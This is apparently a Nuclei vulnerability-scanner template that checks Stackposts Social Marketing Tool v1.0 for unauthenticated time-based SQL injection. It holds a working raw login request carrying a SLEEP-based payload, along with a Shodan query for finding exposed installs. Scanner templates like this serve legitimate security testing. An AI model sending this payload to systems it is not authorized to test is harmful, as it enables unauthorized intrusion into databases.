id: stackposts-sqli

info:
  name: Stackposts Social Marketing Tool v1.0 - SQL Injection
  author: r3Y3r53
  severity: high
  description: |
    SQL Injection is a type of SQL injection attack in which an attacker can exploit a vulnerability in a web application's input fields to manipulate the application's SQL queries.
  reference:
    - https://www.exploit-db.com/exploits/51473
    - https://vulners.com/zdt/1337DAY-ID-38725
    - https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"stackposts"
  tags: sqli,unauth,stackposts

http:
  - raw:
      - |
        @timeout: 15s
        POST /spre/auth/login HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=1')AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg&password=test

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "account you entered")'
          - 'status_code == 200'
        condition: and

# digest: 490a004630440220662ccd9b8b9f90a1c19b7cde278a67e2e867f4b0b8ffd7a4e85b2d65c580100202207e0c260a530c697bde5474336ef11a20a501eb72ba9f0a4fc1d72d1cadb138fa:922c64590222798bb761d5b6d8e72950
